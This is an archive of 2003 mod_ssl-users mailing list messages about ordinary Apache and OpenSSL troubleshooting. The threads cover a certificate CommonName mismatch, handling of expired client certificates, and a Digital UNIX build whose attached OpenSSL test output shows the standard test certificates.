Apache/2.0.43 (Unix) mod_ssl/2.0.43 OpenSSL/0.9.6g DAV/2 configured--
resuming normal operations<---if I try and access the secure site
(https://yin.fokus.gmd.de) I get the following error message in
browser(but I can start the normal site
http://yin.fokus.gmd.de):------>The server's certificate has an invalid
signature. You will not be able to connect to this site securely.<------
Your domain name is not in public DNS so I suppose you do this locally.
You are right. I try this on my laptop for our future projekt. Shoud I
use the IP address and not host name in the server certificate?
but it is changed frequently. 

Best Regards,

Aihong Yin.

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 29 12:47:34 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1E9122AA0CF; Wed, 29 Jan 2003 12:47:34 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mailhub.fokus.gmd.de (mailhub.fokus.gmd.de [193.174.154.14])
	by master.modssl.org (Postfix) with ESMTP id 9AE7D2AA0B7
	for ; Wed, 29 Jan 2003 12:47:26 +0100 (CET)
Received: from fokus.fraunhofer.de (sol [193.174.154.20])
	by mailhub.fokus.gmd.de (8.11.6/8.11.6) with ESMTP id h0TBlMi27186
	for ; Wed, 29 Jan 2003 12:47:22 +0100 (MET)
Message-ID: <3E37BF49.2090406@fokus.fraunhofer.de>
Date: Wed, 29 Jan 2003 12:47:21 +0100
From: Aihong Yin 
Organization: FOKUS
User-Agent: Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.4.1) Gecko/20020406 Netscape6/6.2.2
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: [warn] RSA server certificate CommonName (CN) `yin.fokus.gmd.de' does NOT match server name!?
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Aihong Yin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Boyle Owen wrote:

>PLease post in plain text - my mail client doesn't handle HTML mail...
>
>The thing you type into the browser's Location window has to match
>what's in the cert. Does it? 
>
Yes, it does. but this error "[warn] RSA server certificate CommonName (CN)
does NOT match server name!?" is given during the HTTPS server start. 
and the next step is to start the browser.

>If you are doing all this on a standalone
>laptop, I doubt it.
>
Could you tell me the reason?  what do you mean "standalone"? The laptop get
it's IP address during reboot using DHCP. Is this correct?

Best Regards,
Aihong Yin.

>-----Original Message-----
>From: Aihong Yin [mailto:yin@fokus.fraunhofer.de]
>Sent: Mittwoch, 29. Januar 2003 12:07
>To: modssl-users@modssl.org
>Subject: Re: [warn] RSA server certificate CommonName (CN)
>`yin.fokus.gmd.de' does NOT match server name!?
>
>
>Hello Owen and Toftum,
>
>thanks for your mail.
>
>
>Hello all,I am trying to setup my server (apache 2.0.43, opensl 0.9.6g
>on RedHat 7.1).I have created a SSL server certificate using a self-made
>CA, and am sure thatthe Common Name in the Server Certificate und
>ServerName in http.conf file arethe same "yin.fokus.gmd.de", which is
>identical with the host address.
>Really? Are you sure you have the line:	ServerName yin.fokus.gmd.dein
>the SSL VH config?
>Do you mean that I should configure VirtualHost in the http.conf file?
>But I think the Virtual Host is used for the case
>of more than one web site running on a single machine. Is this correct?
>On my Laptop there is only one web site "yin.fokus.gmd.de".
>I now have tried to configure VirtualHost and it is the same error.
>
>
>If so, are you sure the certificate's common name is
>yin.fokus.gmd.de?Don't just say "Yes", check it with:	openssl x509
>-subject -in /path/to/certthen see what "CN=" is set to.
>
>I have checked it and They are the same ("CN=" is set to
>"yin.fokus.gmd.de).
>
>
>
>I now start apache with "apachect1 startssl"and get the following
>messagein error_log file, but no errors in the console---->[Wed Jan 29
>08:34:02 2003] [warn] RSA server certificate CommonName
>(CN)`yin.fokus.gmd.de' does NOT match server name!?[Wed Jan 29 08:34:03
>2003] [notice] Digest: generating secret for digest authentication
>...[Wed Jan 29 08:34:03 2003] [notice] Digest: done[Wed Jan 29 08:34:04
>2003] [warn] RSA server certificate CommonName (CN)`yin.fokus.gmd.de'
>does NOT match server name!?[Wed Jan 29 08:34:05 2003] [notice]
>Apache/2.0.43 (Unix) mod_ssl/2.0.43 OpenSSL/0.9.6g DAV/2 configured--
>resuming normal operations<---if I try and access the secure site
>(https://yin.fokus.gmd.de) I get the following error message in
>browser(but I can start the normal site
>http://yin.fokus.gmd.de):------>The server's certificate has an invalid
>signature. You will not be able to connect to this site securely.<------
>Your domain name is not in public DNS so I suppose you do this locally.
>You are right. I try this on my laptop for our future projekt. Shoud I
>use the IP address and not host name in the server certificate?
>but it is changed frequently. 
>
>Best Regards,
>
>Aihong Yin.
>
>This message is for the named person's use only. It may contain
>confidential, proprietary or legally privileged information. No
>confidentiality or privilege is waived or lost by any mistransmission.
>If you receive this message in error, please notify the sender urgently
>and then immediately delete the message and any copies of it from your
>system. Please also immediately destroy any hardcopies of the message.
>You must not, directly or indirectly, use, disclose, distribute, print,
>or copy any part of this message if you are not the intended recipient.
>The sender's company reserves the right to monitor all e-mail
>communications through their networks. Any views expressed in this
>message are those of the individual sender, except where the message
>states otherwise and the sender is authorised to state them to be the
>views of the sender's company. 
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

-- 




 



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 29 14:10:48 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6F41C2AA0CF; Wed, 29 Jan 2003 14:10:48 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from vil.com.ua (vil.com.ua [193.109.102.42])
	by master.modssl.org (Postfix) with ESMTP id 0A8502AA0B7
	for ; Wed, 29 Jan 2003 14:10:43 +0100 (CET)
Received: from homecomp ([217.196.168.172])
	by vil.com.ua (8.12.6/8.12.5) with SMTP id h0TD9O3l001803
	for ; Wed, 29 Jan 2003 15:10:31 +0200 (EET)
	(envelope-from olebedew@vil.com.ua)
Message-ID: <006101c2c797$f85d7a20$aca8c4d9@homecomp>
From: "Oleg Lyebyedyev" 
To: 
References: <200301271401.59656.aputnam@pelathe.org> <002b01c2c702$a383a190$99a8c4d9@homecomp> <20030128205708.GA9436@toftum.dk>
Subject: Re: Error on expired date of cert
Date: Wed, 29 Jan 2003 14:58:32 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Oleg Lyebyedyev" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Ok. Is there exists some way to redirect user with expired cert to other
page?


> > Hello,
> >
> > I have following option:
> > SSLVerifyClient optional
> >
> > (optional_no_ca - same result)
> >
> > My servlet analizes data from cert. With correct certs all is ok.
> > Somebody without cert also has access to my page and I know that he
hasn't a
> > cert, but when expired cert is used then server error is occured.
> > What is problem? Can I create ssl configuration to give access for all
certs
> > and to get cert info.
> >
> Currently that is not possible afaict.
>
> vh
>
> Mads Toftum
> --
> `Darn it, who spiked my coffee with water?!' - lwall
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 29 14:17:21 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4F8392AA0CF; Wed, 29 Jan 2003 14:17:21 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id ECA652AA0B7
	for ; Wed, 29 Jan 2003 14:17:15 +0100 (CET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id h0TDH9Cl003475
	for ; Wed, 29 Jan 2003 14:17:11 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id h0TDH7mM019227
	for ; Wed, 29 Jan 2003 14:17:07 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Subject: RE: [warn] RSA server certificate CommonName (CN) `yin.fokus.gmd.de' does NOT match server name!?
Date: Wed, 29 Jan 2003 14:17:07 +0100
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: [warn] RSA server certificate CommonName (CN) `yin.fokus.gmd.de' does NOT match server name!?
Thread-Index: AcLHjFbvEAB+X+EiRj6mTQiUNl330wAC773w
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>-----Original Message-----
>From: Aihong Yin [mailto:yin@fokus.fraunhofer.de]
>Sent: Mittwoch, 29. Januar 2003 12:47
>To: modssl-users@modssl.org
>Subject: Re: [warn] RSA server certificate CommonName (CN)
>`yin.fokus.gmd.de' does NOT match server name!?
>
>
>
>Boyle Owen wrote:
>
>>PLease post in plain text - my mail client doesn't handle HTML mail...
>>
>>The thing you type into the browser's Location window has to match
>>what's in the cert. Does it?=20
>>
>Yes, it does. but this error "[warn] RSA server certificate=20
>CommonName (CN)
>does NOT match server name!?" is given during the HTTPS server start.=20
>and the next step is to start the browser.

In your httpd.conf you must have a ServerName directive - what is it set =
to? It must be the same as the common name in the cert.


>
>>If you are doing all this on a standalone
>>laptop, I doubt it.
>>
>Could you tell me the reason?  what do you mean "standalone"?=20
>The laptop get
>it's IP address during reboot using DHCP.

So how do you access the web site? You must type something into the =
browser - unless you type yin.fokus.gmd.de, you will get a warning. But =
how can you type this in?  - you would need a local DNS set up to =
resolve this domain. Do you have this?



> Is this correct?
>
>Best Regards,
>Aihong Yin.
>
>>-----Original Message-----
>>From: Aihong Yin [mailto:yin@fokus.fraunhofer.de]
>>Sent: Mittwoch, 29. Januar 2003 12:07
>>To: modssl-users@modssl.org
>>Subject: Re: [warn] RSA server certificate CommonName (CN)
>>`yin.fokus.gmd.de' does NOT match server name!?
>>
>>
>>Hello Owen and Toftum,
>>
>>thanks for your mail.
>>
>>
>>Hello all,I am trying to setup my server (apache 2.0.43, opensl 0.9.6g
>>on RedHat 7.1).I have created a SSL server certificate using=20
>a self-made
>>CA, and am sure thatthe Common Name in the Server Certificate und
>>ServerName in http.conf file arethe same "yin.fokus.gmd.de", which is
>>identical with the host address.
>>Really? Are you sure you have the line:	ServerName=20
>yin.fokus.gmd.dein
>>the SSL VH config?
>>Do you mean that I should configure VirtualHost in the http.conf file?
>>But I think the Virtual Host is used for the case
>>of more than one web site running on a single machine. Is=20
>this correct?
>>On my Laptop there is only one web site "yin.fokus.gmd.de".
>>I now have tried to configure VirtualHost and it is the same error.
>>
>>
>>If so, are you sure the certificate's common name is
>>yin.fokus.gmd.de?Don't just say "Yes", check it with:	openssl x509
>>-subject -in /path/to/certthen see what "CN=3D" is set to.
>>
>>I have checked it and They are the same ("CN=3D" is set to
>>"yin.fokus.gmd.de).
>>
>>
>>
>>I now start apache with "apachect1 startssl"and get the following
>>messagein error_log file, but no errors in the console---->[Wed Jan 29
>>08:34:02 2003] [warn] RSA server certificate CommonName
>>(CN)`yin.fokus.gmd.de' does NOT match server name!?[Wed Jan=20
>29 08:34:03
>>2003] [notice] Digest: generating secret for digest authentication
>>...[Wed Jan 29 08:34:03 2003] [notice] Digest: done[Wed Jan=20
>29 08:34:04
>>2003] [warn] RSA server certificate CommonName (CN)`yin.fokus.gmd.de'
>>does NOT match server name!?[Wed Jan 29 08:34:05 2003] [notice]
>>Apache/2.0.43 (Unix) mod_ssl/2.0.43 OpenSSL/0.9.6g DAV/2 configured--
>>resuming normal operations<---if I try and access the secure site
>>(https://yin.fokus.gmd.de) I get the following error message in
>>browser(but I can start the normal site
>>http://yin.fokus.gmd.de):------>The server's certificate has=20
>an invalid
>>signature. You will not be able to connect to this site=20
>securely.<------
>>Your domain name is not in public DNS so I suppose you do=20
>this locally.
>>You are right. I try this on my laptop for our future projekt. Shoud I
>>use the IP address and not host name in the server certificate?
>>but it is changed frequently.=20
>>
>>Best Regards,
>>
>>Aihong Yin.
>>
>>This message is for the named person's use only. It may contain
>>confidential, proprietary or legally privileged information. No
>>confidentiality or privilege is waived or lost by any mistransmission.
>>If you receive this message in error, please notify the=20
>sender urgently
>>and then immediately delete the message and any copies of it from your
>>system. Please also immediately destroy any hardcopies of the message.
>>You must not, directly or indirectly, use, disclose,=20
>distribute, print,
>>or copy any part of this message if you are not the intended=20
>recipient.
>>The sender's company reserves the right to monitor all e-mail
>>communications through their networks. Any views expressed in this
>>message are those of the individual sender, except where the message
>>states otherwise and the sender is authorised to state them to be the
>>views of the sender's company.=20
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>
>--=20
>
>
>
>
>=20
>
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 29 14:46:49 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 65ECD2AA0CF; Wed, 29 Jan 2003 14:46:49 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.slb.com (feamta01.singapore.fea.slb.com [163.184.1.20])
	by master.modssl.org (Postfix) with ESMTP id 437FF2AA0B7
	for ; Wed, 29 Jan 2003 14:46:43 +0100 (CET)
Received: from conversion-daemon.feamta01.singapore.fea.slb.com by
 feamta01.singapore.fea.slb.com
 (iPlanet Messaging Server 5.2 HotFix 1.02 (built Sep 16 2002))
 id <0H9H00K019ZXM5@feamta01.singapore.fea.slb.com> for
 modssl-users@modssl.org; Wed, 29 Jan 2003 13:43:49 +0000 (GMT)
Received: from nawnt02.naples.eur.slb.com
 (NAWNT02.naples.eur.slb.com [134.32.195.212])
 by feamta01.singapore.fea.slb.com
 (iPlanet Messaging Server 5.2 HotFix 1.02 (built Sep 16 2002))
 with ESMTP id <0H9H00CMKA4ROF@feamta01.singapore.fea.slb.com> for
 modssl-users@modssl.org; Wed, 29 Jan 2003 13:43:41 +0000 (GMT)
Received: by NAWNT02.naples.eur.slb.com with Internet Mail Service
 (5.5.2653.19)	id ; Wed, 29 Jan 2003 14:43:06 +0100
Content-return: allowed
Date: Wed, 29 Jan 2003 14:43:06 +0100
From: Zampognaro Sergio 
Subject: new to Apache-SSL world needs help
To: modssl-users@modssl.org
Message-id:
 <1F6B1C04A612D311B27400A0C9ECE51202A1C3E3@NAWNT02.naples.eur.slb.com>
MIME-version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-type: multipart/mixed; boundary="Boundary_(ID_Djye1HMUmNmPze37iMbfug)"
Importance: high
X-Priority: 1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Zampognaro Sergio 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

--Boundary_(ID_Djye1HMUmNmPze37iMbfug)
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BIT

Hi all,
I need to migrate a web site from http to secure https. Mine is a Digital
UNIX V4.0F  (Rev. 1229) server.

I downloaded following packages:
 - openssl-0.9.7
 - httpd-2.0.44


1) openssl installation - steps performed:

./config --prefix=/home/aspprod/aspapp/mySSL/openSSL

make
	I got this warnings on stderr:
	ar: Warning: creating ../libcrypto.a
	ar: Warning: creating ../libssl.a

make test
	On stderr I got this messages contained in attached fiel:
errore3.txt

make install
	I got this messages on stderr:
	./pod2mantest: pod2man: not found
	pod2man does not work properly ('BasicTest' failed).  Looking for
another pod2man ...
	No working pod2man found.  Consider installing a new version.
	As a workaround, we'll use a bundled old copy of pod2man.pl.

First of all do you think all this warnings are fatal for my openssl
installation?

2) apache2 installation - steps performed:

./configure --prefix=/home/aspprod/aspapp/mySSL/apache2
--with=/home/aspprod/aspapp/mySSL/openSSL

make
	I got a lot of warnings on stderr!

make install

At this point I have to customize http.conf and ssl.conf files.
Could you send me an example of such files already modified? I need to
understand what I must change.

thanks in advance!
Sergio

> ________________________________________
>                                                          SchlumbergerSema
ing. Sergio Zampognaro
System Integration - SMA
Via Antiniana 2A - 80078 Pozzuoli (NA) - ITALY
> Mobile*+39 335 131 54 26
> Phone *  +39 081 6103 483
> Fax      6   +39 081 6103 200		
> e-mail *  SZampognaro@naples.sema.slb.com
> 
This email is confidential and intended solely for the use of the individual
to whom it is addressed. Any views or opinions presented are solely those of
the author and do not necessarily represent those of SchlumbergerSema SpA.
If you are not the intended recipient, be advised that you have received
this email in error and that any use, dissemination, forwarding, printing,
or copying of this email is strictly prohibited.
If you have received this email in error please notify the SchlumbergerSema
Helpdesk, by telephone on +39.0125.810500 or by e-mail on
helpdesk@semagroup.it





--Boundary_(ID_Djye1HMUmNmPze37iMbfug)
Content-type: text/plain; name=errore3.txt
Content-transfer-encoding: 7BIT
Content-disposition: attachment; filename=errore3.txt

test BN_add
test BN_sub
test BN_lshift1
test BN_lshift (fixed)
test BN_lshift
test BN_rshift1
test BN_rshift
test BN_sqr
test BN_mul
test BN_div
test BN_div_recp
test BN_mod
test BN_mod_mul
test BN_mont
test BN_mod_exp
test BN_exp
test BN_kronecker
..............++++++
....................................................................................................
test BN_mod_sqrt
.....
.....
.....
.....
.....
.....
.....
.....
.......++++++++++++
.....
.....++++++++++++
.....
...............++++++++++++
.....
..++++++++++++
.....
...++++++++++++
.....
...++++++++++++
.....
....................++++++++++++
.....
.......++++++++++++
.....
bc does not work properly ('SunOStest' failed).  Looking for another bc ...
/usr/bin/bc does not work properly ('SunOStest' failed).  Looking for another bc ...
No working bc found.  Consider installing GNU bc.

0 tests passed
Generating a 512 bit RSA private key
.++++++++++++
....++++++++++++
writing new private key to 'testkey.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:AU
State or Province Name (full name) [Queensland]:
Locality Name (eg, city) []:Brisbane
Organization Name (eg, company) []:CryptSoft Pty Ltd
Organizational Unit Name (eg, section) []:.
Common Name (eg, YOUR name) []:Eric Young
Email Address []:eay@mincom.oz.au
verify OK
test generation of DSA parameters
.++++++++++++++++++++++++++++++++++++++++++++++++++*
...+........+..+...+............+.+..+..........................................................................++++++++++++++++++++
+++++++++++++++++++++++++++++++*
seed
D5014E4B 60EF2BA8 B6211B40 62BA3224 E0427DD3 
counter=105 h=2
P:   
    00:8d:f2:a4:94:49:22:76:aa:3d:25:75:9b:b0:68:
    69:cb:ea:c0:d8:3a:fb:8d:0c:f7:cb:b8:32:4f:0d:
    78:82:e5:d0:76:2f:c5:b7:21:0e:af:c2:e9:ad:ac:
    32:ab:7a:ac:49:69:3d:fb:f8:37:24:c2:ec:07:36:
    ee:31:c8:02:91
Q:   
    00:c7:73:21:8c:73:7e:c8:ee:99:3b:4f:2d:ed:30:
    f4:8e:da:ce:91:5f
G:   
    62:6d:02:78:39:ea:0a:13:41:31:63:a5:5b:4c:b5:
    00:29:9d:55:22:95:6c:ef:cb:3b:ff:10:f3:99:ce:
    2c:2e:71:cb:9d:e5:fa:24:ba:bf:58:e5:b7:95:21:
    92:5c:9c:c4:2e:9f:6f:46:4b:08:8c:c5:72:af:53:
    e6:d7:88:02
test generation of DSA parameters
.++++++++++++++++++++++++++++++++++++++++++++++++++*
...+........+..+...+............+.+..+..........................................................................++++++++++++++++++++
+++++++++++++++++++++++++++++++*
seed
D5014E4B 60EF2BA8 B6211B40 62BA3224 E0427DD3 
counter=105 h=2
P:   
    00:8d:f2:a4:94:49:22:76:aa:3d:25:75:9b:b0:68:
    69:cb:ea:c0:d8:3a:fb:8d:0c:f7:cb:b8:32:4f:0d:
    78:82:e5:d0:76:2f:c5:b7:21:0e:af:c2:e9:ad:ac:
    32:ab:7a:ac:49:69:3d:fb:f8:37:24:c2:ec:07:36:
    ee:31:c8:02:91
Q:   
    00:c7:73:21:8c:73:7e:c8:ee:99:3b:4f:2d:ed:30:
    f4:8e:da:ce:91:5f
G:   
    62:6d:02:78:39:ea:0a:13:41:31:63:a5:5b:4c:b5:
    00:29:9d:55:22:95:6c:ef:cb:3b:ff:10:f3:99:ce:
    2c:2e:71:cb:9d:e5:fa:24:ba:bf:58:e5:b7:95:21:
    92:5c:9c:c4:2e:9f:6f:46:4b:08:8c:c5:72:af:53:
    e6:d7:88:02
Generating a 512 bit RSA private key
...........++++++++++++
................++++++++++++
writing new private key to 'keyCA.ss'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:AU
Organization Name (eg, company) []:Dodgy Brothers
Common Name (eg, YOUR name) []:Dodgy CA
unable to load 'random state'
This means that the random number generator has not been seeded
with much random data.
Consider setting the RANDFILE environment variable to point at a file that
'random' data can be kept in (the file will be overwritten).
Signature ok
subject=/C=AU/O=Dodgy Brothers/CN=Dodgy CA
Getting Private key
unable to load 'random state'
This means that the random number generator has not been seeded
with much random data.
Consider setting the RANDFILE environment variable to point at a file that
'random' data can be kept in (the file will be overwritten).
Getting request Private Key
Generating certificate request
verify OK
verify OK
Generating a 512 bit RSA private key
................++++++++++++
.............................++++++++++++
writing new private key to 'keyU.ss'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:AU
Organization Name (eg, company) []:Dodgy Brothers
Common Name (eg, YOUR name) []:Brother 1
Common Name (eg, YOUR name) []:Brother 2
unable to load 'random state'
This means that the random number generator has not been seeded
with much random data.
Consider setting the RANDFILE environment variable to point at a file that
'random' data can be kept in (the file will be overwritten).
Signature ok
subject=/C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
Getting CA Private Key
Generating a 512 bit RSA private key
.............++++++++++++
...........................++++++++++++
writing new private key to './demoCA/private/./cakey.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:AU
Organization Name (eg, company) []:Dodgy Brothers
Common Name (eg, YOUR name) []:Dodgy CA
Generating a 512 bit RSA private key
............................................++++++++++++
..++++++++++++
writing new private key to 'newreq.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:AU
Organization Name (eg, company) []:Dodgy Brothers
Common Name (eg, YOUR name) []:Brother 1
Common Name (eg, YOUR name) []:Brother 2
Using configuration from ../apps/openssl.cnf
unable to load 'random state'
This means that the random number generator has not been seeded
with much random data.
Check that the request matches the signature
Signature ok
Certificate Details:
        Serial Number: 1 (0x1)
        Validity
            Not Before: Jan 29 10:47:46 2003 GMT
            Not After : Jan 29 10:47:46 2004 GMT
        Subject:
            countryName               = AU
            organizationName          = Dodgy Brothers
            commonName                = Brother 1
            commonName                = Brother 2
        X509v3 extensions:
            X509v3 Basic Constraints: 
            CA:FALSE
            Netscape Comment: 
            OpenSSL Generated Certificate
            X509v3 Subject Key Identifier: 
            66:F5:59:18:BA:EA:16:D6:6E:05:27:D7:A7:6D:11:88:D0:FA:C3:26
            X509v3 Authority Key Identifier: 
            DirName:/C=AU/O=Dodgy Brothers/CN=Dodgy CA
            serial:00

Certificate is to be certified until Jan 29 10:47:46 2004 GMT (365 days)
Sign the certificate? [y/n]:

1 out of 1 certificate requests certified, commit? [y/n]Write out database with 1 new entries
Data Base Updated
server authentication
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
client authentication
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
client authentication
server authentication
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
server authentication
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
client authentication
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
client authentication
server authentication
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
server authentication
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
client authentication
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
client authentication
server authentication
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
server authentication
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
client authentication
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
client authentication
server authentication
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
server authentication
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
client authentication
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
client authentication
server authentication
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
server authentication
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
client authentication
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
client authentication
server authentication
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
client authentication
server authentication
